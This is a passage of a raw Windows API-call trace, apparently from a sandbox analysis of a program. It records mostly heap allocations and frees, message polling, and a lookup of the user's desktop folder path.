HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.664] FreeLibrary (hLibModule=0x76390000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0106.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0106.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0106.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0106.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0106.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0106.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0106.665] CloseHandle (hObject=0x44c) returned 1 [0106.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0106.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0106.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0106.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0106.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0106.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0106.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0106.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0106.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0106.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0106.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0106.668] CloseHandle (hObject=0x458) returned 1 [0106.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0106.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0106.671] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0106.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0106.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0106.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0106.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0106.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0106.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0106.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0106.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0106.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0106.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0106.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0106.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0106.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0106.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0106.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0106.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0106.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0106.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0106.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0106.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75948 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0106.679] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0106.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0106.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0106.680] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0106.680] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6418 [0106.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0106.680] HeapFree (in: 